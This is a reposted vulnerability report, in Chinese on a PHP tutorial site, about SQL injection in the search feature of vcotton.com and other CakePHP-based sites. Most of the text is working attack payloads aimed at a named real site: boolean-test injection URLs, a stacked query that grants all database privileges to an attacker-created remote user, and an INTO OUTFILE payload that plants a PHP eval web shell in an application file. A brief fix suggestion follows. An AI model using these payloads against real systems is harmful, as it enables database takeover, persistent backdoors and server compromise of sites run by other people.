网站地图    收藏   

主页 > 后端 > 网站安全 >

维棉等多个CAKEPHP框架站搜索处存在SQL注入攻击及

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251cakephp多数框架版本架设的应用不带搜索的注入过滤这里的1=1可以任意换。然后你可以%#39;) and 1=1;grant all privileg......

http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251
cakephp多数框架版本架设的应用不带搜索的注入过滤
这里的1=1可以任意换。
然后你可以
%') and 1=1;grant all privileges on *.* to 'zimengqian'@'%' identified by '12345678';#
你可以
%') and 1=(select '<?php eval($_POST[c])?>' into outfile '/data/web_root/abram.intra.vcotton.com/www/current/app/app_controller.php');#(悲催的是无写权限)
漏洞证明:http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D1+and+1+like%28%27%251
http://www.vcotton.com/searchs?keywords=%25%27%29+and+1%3D2+and+1+like%28%27%251
修复方案:www.2cto.com
 
自己在适当位置addslashes 并且 用str_replace给%和_加斜杠
或者修改
core/libs/controller/components/request_handler.php 以适应全部(也许2.0已经修改了这个bug)
 
作者  紫梦芊

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论